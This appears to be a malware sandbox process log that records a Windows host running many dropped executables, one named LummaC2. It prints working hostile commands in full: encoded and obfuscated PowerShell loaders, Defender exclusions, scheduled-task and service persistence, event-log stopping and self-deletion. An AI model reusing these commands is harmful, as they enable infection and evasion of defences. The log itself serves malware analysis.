C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 488 -s 536
3⤵
- Program crash
PID:924

C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe
"C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe"
2⤵
PID:1164

C:\Users\Admin\AppData\Local\Temp\a\BroomSetup.exe
"C:\Users\Admin\AppData\Local\Temp\a\BroomSetup.exe"
2⤵
PID:2104

C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe"
2⤵
PID:1772

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2588

C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
4⤵
PID:2668

C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
4⤵
PID:1728

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
4⤵
PID:3600

C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe
"C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe"
2⤵
PID:1860

C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe
"C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe"
2⤵
PID:2800

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe
3⤵
PID:1528

C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
4⤵
- Runs ping.exe
PID:1320

C:\Users\Admin\AppData\Local\Temp\a\new1.exe
"C:\Users\Admin\AppData\Local\Temp\a\new1.exe"
2⤵
PID:2536

C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe
"C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe"
2⤵
PID:2004

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:1584

C:\Users\Admin\AppData\Local\Temp\a\ISetup5.exe
"C:\Users\Admin\AppData\Local\Temp\a\ISetup5.exe"
2⤵
PID:2068

C:\Users\Admin\AppData\Local\Temp\u1lg.0.exe
"C:\Users\Admin\AppData\Local\Temp\u1lg.0.exe"
3⤵
PID:2452

C:\Users\Admin\AppData\Local\Temp\u1lg.1.exe
"C:\Users\Admin\AppData\Local\Temp\u1lg.1.exe"
3⤵
PID:2480

C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe
"C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe"
2⤵
PID:844

C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
3⤵
PID:324

C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe"
2⤵
PID:2796

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:716

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 552
3⤵
- Program crash
PID:2332

C:\Users\Admin\AppData\Local\Temp\a\june.exe
"C:\Users\Admin\AppData\Local\Temp\a\june.exe"
2⤵
PID:2448

C:\Users\Admin\AppData\Local\Temp\is-3GDRK.tmp\june.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3GDRK.tmp\june.tmp" /SL5="$30202,3525916,54272,C:\Users\Admin\AppData\Local\Temp\a\june.exe"
3⤵
PID:472

C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe
"C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe" -i
4⤵
PID:1268

C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe
"C:\Users\Admin\AppData\Local\Sun Vox\sunvox.exe" -s
4⤵
PID:540

C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe"
2⤵
PID:1604

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:1660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1604 -s 540
3⤵
- Program crash
PID:2272

C:\Users\Admin\AppData\Local\Temp\a\new.exe
"C:\Users\Admin\AppData\Local\Temp\a\new.exe"
2⤵
PID:2528

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:556

C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe
"C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe"
2⤵
PID:2652

C:\Users\Admin\AppData\Local\Temp\a\123p.exe
"C:\Users\Admin\AppData\Local\Temp\a\123p.exe"
2⤵
PID:1664

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
3⤵
PID:1752

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
3⤵
PID:2016

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
3⤵
PID:1488

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
3⤵
PID:308

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "OBGPQMHF"
3⤵
- Launches sc.exe
PID:844

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
3⤵
- Launches sc.exe
PID:2812

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:1680

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "OBGPQMHF"
3⤵
- Launches sc.exe
PID:1136

C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe
"C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe"
2⤵
PID:1956

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\BlockComponentwebMonitordhcp\AbAw8xfGFsmxdxvuwvbKubDJeV.vbe"
3⤵
PID:1396

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\BlockComponentwebMonitordhcp\8H5kf2bUK2r.bat" "
4⤵
PID:892

C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe
"C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe"
5⤵
PID:2772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uzN3pPJHyT.bat"
6⤵
PID:2044

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
7⤵
PID:2736

C:\Program Files (x86)\Microsoft Jufbhx\vbc.exe
"C:\Program Files (x86)\Microsoft Jufbhx\vbc.exe"
7⤵
PID:3076

C:\Users\Admin\AppData\Local\Temp\a\ISetup1.exe
"C:\Users\Admin\AppData\Local\Temp\a\ISetup1.exe"
2⤵
PID:2384

C:\Users\Admin\AppData\Local\Temp\u1u8.0.exe
"C:\Users\Admin\AppData\Local\Temp\u1u8.0.exe"
3⤵
PID:1456

C:\Users\Admin\AppData\Local\Temp\u1u8.1.exe
"C:\Users\Admin\AppData\Local\Temp\u1u8.1.exe"
3⤵
PID:2952

C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe
"C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe"
2⤵
PID:1772

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
3⤵
PID:2704

C:\Windows\system32\cmd.exe
"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"
3⤵
PID:2256

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
3⤵
PID:1956

C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
4⤵
- Creates scheduled task(s)
PID:2572

C:\Windows\system32\cmd.exe
"cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"
3⤵
PID:2408

C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe
"C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe"
2⤵
PID:1284

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "hgfhjjhgj" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:2812

C:\Users\Admin\AppData\Local\Temp\a\crypt.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypt.exe"
2⤵
PID:956

C:\Windows\SysWOW64\wscript.exe
"wscript.exe" "C:\Users\Admin\start.vbs"
3⤵
PID:352

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\temp.bat" "
4⤵
PID:2028

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KDQokZW5jb2RlZEFycmF5ID0gQCgxNTksMjIwLDIzOCwyMzgsMjI0LDIzMiwyMjEsMjMxLDI0NCwxNjksMTkyLDIzMywyMzksMjM3LDI0NCwyMDMsMjM0LDIyOCwyMzMsMjM5LDE2OSwxOTYsMjMzLDI0MSwyMzQsMjMwLDIyNCwxNjMsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjcsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjQsMTgyKQ0KJGRlY29kZWRTdHJpbmcgPSBDb252ZXJ0LUFzY2lpVG9TdHJpbmcgJGVuY29kZWRBcnJheQ0KDQoNCiRmaWxlUGF0aCA9IEpvaW4tUGF0aCAkZW52OlVzZXJQcm9maWxlICJleHBsb3Jlci5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\explorer.ps1' -Encoding UTF8"
5⤵
PID:680

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\explorer.ps1"
5⤵
PID:2524

C:\Users\Admin\AppData\Local\Temp\a\Opera_109.0.5097.38_Autoupdate_x64.exe
"C:\Users\Admin\AppData\Local\Temp\a\Opera_109.0.5097.38_Autoupdate_x64.exe"
2⤵
PID:2592

C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe
"C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe"
2⤵
PID:3208

C:\Users\Admin\AppData\Local\Temp\a\crypted_69a30000.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted_69a30000.exe"
2⤵
PID:4004

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4004 -s 540
3⤵
- Program crash
PID:3296

C:\Users\Admin\AppData\Local\Temp\a\garits.exe
"C:\Users\Admin\AppData\Local\Temp\a\garits.exe"
2⤵
PID:4088

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\garits.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\garits.exe' -Force
3⤵
PID:4392

C:\Users\Admin\AppData\Local\Temp\a\current.exe
"C:\Users\Admin\AppData\Local\Temp\a\current.exe"
2⤵
PID:3120

C:\Users\Admin\AppData\Local\Temp\a\test.exe
"C:\Users\Admin\AppData\Local\Temp\a\test.exe"
2⤵
PID:3360

C:\Users\Admin\AppData\Local\Temp\a\123.exe
"C:\Users\Admin\AppData\Local\Temp\a\123.exe"
2⤵
PID:3544

C:\Users\Admin\AppData\Local\Temp\a\sys.exe
"C:\Users\Admin\AppData\Local\Temp\a\sys.exe"
2⤵
PID:1868

C:\Users\Admin\AppData\Local\Temp\a\sarra.exe
"C:\Users\Admin\AppData\Local\Temp\a\sarra.exe"
2⤵
PID:3888

C:\Users\Admin\AppData\Local\Temp\a\JSIDBWSJK.exe
"C:\Users\Admin\AppData\Local\Temp\a\JSIDBWSJK.exe"
2⤵
PID:3344

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp7C9F.tmp.bat" "
3⤵
PID:2060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\tmp7C9F.tmp.bat"
4⤵
PID:3476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\tmp7C9F.tmp.bat';$IKhK='MahibHihibHnhibHModhibHulhibHehibH'.Replace('hibH', ''),'GetQgnnCuQgnnrrQgnneQgnnntPQgnnroQgnnceQgnnsQgnnsQgnn'.Replace('Qgnn', ''),'EleVKaqmVKaqeVKaqntVKaqAtVKaq'.Replace('VKaq', ''),'ReaXrSRdLiXrSRnXrSResXrSR'.Replace('XrSR', ''),'DeDwcdcDwcdomDwcdpDwcdreDwcdsDwcdsDwcd'.Replace('Dwcd', ''),'CVrqZreaVrqZtVrqZeVrqZDVrqZecVrqZryVrqZptoVrqZrVrqZ'.Replace('VrqZ', ''),'ChXNvfaXNvfnXNvfgXNvfeEXNvfxteXNvfnsXNvfiXNvfonXNvf'.Replace('XNvf', ''),'SpHdEMlitHdEM'.Replace('HdEM', ''),'EnFMIKtFMIKryFMIKPFMIKoiFMIKntFMIK'.Replace('FMIK', ''),'CCPxDopCPxDyCPxDToCPxD'.Replace('CPxD', ''),'InLeisvLeisokLeiseLeis'.Replace('Leis', ''),'TzEulranzEulszEulfzEulorzEulmzEulFzEulinzEulazEullBzEullozEulckzEul'.Replace('zEul', ''),'LMYvEoMYvEaMYvEdMYvE'.Replace('MYvE', ''),'FrgPovomgPovBgPovagPovsgPove64gPovStgPovrgPovigPovnggPov'.Replace('gPov', '');powershell -w hidden;function Wjvpz($DSMeA){$LRUPP=[System.Security.Cryptography.Aes]::Create();$LRUPP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$LRUPP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$LRUPP.Key=[System.Convert]::($IKhK[13])('hbO8R88HBl6x9E1ChjrqAUcnoAC3B8p99JSIvXSwQuY=');$LRUPP.IV=[System.Convert]::($IKhK[13])('5zVFVvVJKQyl6Cns03Obiw==');$folEv=$LRUPP.($IKhK[5])();$SLWGx=$folEv.($IKhK[11])($DSMeA,0,$DSMeA.Length);$folEv.Dispose();$LRUPP.Dispose();$SLWGx;}function TImJD($DSMeA){$gpnDG=New-Object System.IO.MemoryStream(,$DSMeA);$hLGlZ=New-Object System.IO.MemoryStream;$KsXZc=New-Object System.IO.Compression.GZipStream($gpnDG,[IO.Compression.CompressionMode]::($IKhK[4]));$KsXZc.($IKhK[9])($hLGlZ);$KsXZc.Dispose();$gpnDG.Dispose();$hLGlZ.Dispose();$hLGlZ.ToArray();}$Ewgsd=[System.IO.File]::($IKhK[3])([Console]::Title);$WuYWe=TImJD (Wjvpz ([Convert]::($IKhK[13])([System.Linq.Enumerable]::($IKhK[2])($Ewgsd, 5).Substring(2))));$NZPxf=TImJD (Wjvpz ([Convert]::($IKhK[13])([System.Linq.Enumerable]::($IKhK[2])($Ewgsd, 6).Substring(2))));[System.Reflection.Assembly]::($IKhK[12])([byte[]]$NZPxf).($IKhK[8]).($IKhK[10])($null,$null);[System.Reflection.Assembly]::($IKhK[12])([byte[]]$WuYWe).($IKhK[8]).($IKhK[10])($null,$null); "
5⤵
PID:3412

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
5⤵
PID:2104

C:\Users\Admin\AppData\Local\Temp\a\Locker.exe
"C:\Users\Admin\AppData\Local\Temp\a\Locker.exe"
2⤵
PID:2728

C:\Users\Admin\AppData\Local\Temp\a\eeee.exe
"C:\Users\Admin\AppData\Local\Temp\a\eeee.exe"
2⤵
PID:3312

C:\Users\Admin\AppData\Local\Temp\a\inte.exe
"C:\Users\Admin\AppData\Local\Temp\a\inte.exe"
2⤵
PID:3496

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\a\inte.exe" & exit
3⤵
PID:2604

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "inte.exe" /f
4⤵
- Kills process with taskkill
PID:3372

C:\Users\Admin\AppData\Local\Temp\a\conan.exe
"C:\Users\Admin\AppData\Local\Temp\a\conan.exe"
2⤵
PID:3764

C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
2⤵
PID:3816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XClient.exe'
3⤵
PID:1196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
3⤵
PID:3628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\WindowsHealthSystem.exe'
3⤵
PID:2908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsHealthSystem.exe'
3⤵
PID:4212

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsHealthSystem" /tr "C:\Users\Admin\AppData\Local\WindowsHealthSystem.exe"
3⤵
- Creates scheduled task(s)
PID:4536

C:\Users\Admin\AppData\Local\Temp\a\hghgfhjfhmain.exe
"C:\Users\Admin\AppData\Local\Temp\a\hghgfhjfhmain.exe"
2⤵
PID:2956

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "fgfdhdgg" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\gfgfgf\gfdgfdg.exe" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:1692

C:\Users\Admin\AppData\Roaming\gfgfgf\gfdgfdg.exe
"C:\Users\Admin\AppData\Roaming\gfgfgf\gfdgfdg.exe"
3⤵
PID:2640

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "fgfdhdgg" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\gfgfgf\gfdgfdg.exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:2540

C:\Users\Admin\AppData\Local\Temp\a\swiiiii.exe
"C:\Users\Admin\AppData\Local\Temp\a\swiiiii.exe"
2⤵
PID:3188

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3208

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3120

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3188 -s 568
3⤵
- Program crash
PID:1916

C:\Users\Admin\AppData\Local\Temp\a\Akh.exe
"C:\Users\Admin\AppData\Local\Temp\a\Akh.exe"
2⤵
PID:3736

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
3⤵
PID:3808

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
3⤵
PID:3756

C:\Users\Admin\Pictures\uhyDfp3pUT6LWa9mksjzGhVc.exe
"C:\Users\Admin\Pictures\uhyDfp3pUT6LWa9mksjzGhVc.exe"
4⤵
PID:4292

C:\Users\Admin\AppData\Local\Temp\u3b8.0.exe
"C:\Users\Admin\AppData\Local\Temp\u3b8.0.exe"
5⤵
PID:4360

C:\Users\Admin\AppData\Local\Temp\u3b8.1.exe
"C:\Users\Admin\AppData\Local\Temp\u3b8.1.exe"
5⤵
PID:4380

C:\Users\Admin\Pictures\UoGabRdBSn3XOQYYM6P2fgsn.exe
"C:\Users\Admin\Pictures\UoGabRdBSn3XOQYYM6P2fgsn.exe"
4⤵
PID:4528

C:\Users\Admin\AppData\Local\Temp\7zS493.tmp\Install.exe
.\Install.exe /jELsJdidOq "385118" /S
5⤵
PID:5072

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
6⤵
PID:4936

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
PID:4312

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bgNHpsssZstYPMxCCI" /SC once /ST 07:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\zDVVcON.exe\" mP /bzsite_idiiG 385118 /S" /V1 /F
6⤵
- Creates scheduled task(s)
PID:4416

C:\Users\Admin\Pictures\GWQ1OF5IlMdznGXvfJ8CgQlK.exe
"C:\Users\Admin\Pictures\GWQ1OF5IlMdznGXvfJ8CgQlK.exe"
4⤵
PID:4904

C:\Users\Admin\AppData\Local\Temp\7zS686.tmp\Install.exe
.\Install.exe /jELsJdidOq "385118" /S
5⤵
PID:4700

C:\Users\Admin\AppData\Local\Temp\a\ISetup10.exe
"C:\Users\Admin\AppData\Local\Temp\a\ISetup10.exe"
2⤵
PID:3860

C:\Users\Admin\AppData\Local\Temp\u2z8.0.exe
"C:\Users\Admin\AppData\Local\Temp\u2z8.0.exe"
3⤵
PID:3152

C:\Users\Admin\AppData\Local\Temp\u2z8.1.exe
"C:\Users\Admin\AppData\Local\Temp\u2z8.1.exe"
3⤵
PID:4364

C:\Users\Admin\AppData\Local\Temp\a\koooooo.exe
"C:\Users\Admin\AppData\Local\Temp\a\koooooo.exe"
2⤵
PID:3700

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 560
3⤵
- Program crash
PID:3976

C:\Users\Admin\AppData\Local\Temp\a\Titanium.exe
"C:\Users\Admin\AppData\Local\Temp\a\Titanium.exe"
2⤵
PID:3908

C:\Users\Admin\AppData\Local\Temp\a\Crypto.exe
"C:\Users\Admin\AppData\Local\Temp\a\Crypto.exe"
2⤵
PID:2736

C:\Users\Admin\AppData\Local\Temp\a\LummaC2.exe
"C:\Users\Admin\AppData\Local\Temp\a\LummaC2.exe"
2⤵
PID:4032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 124
3⤵
- Program crash
PID:2408

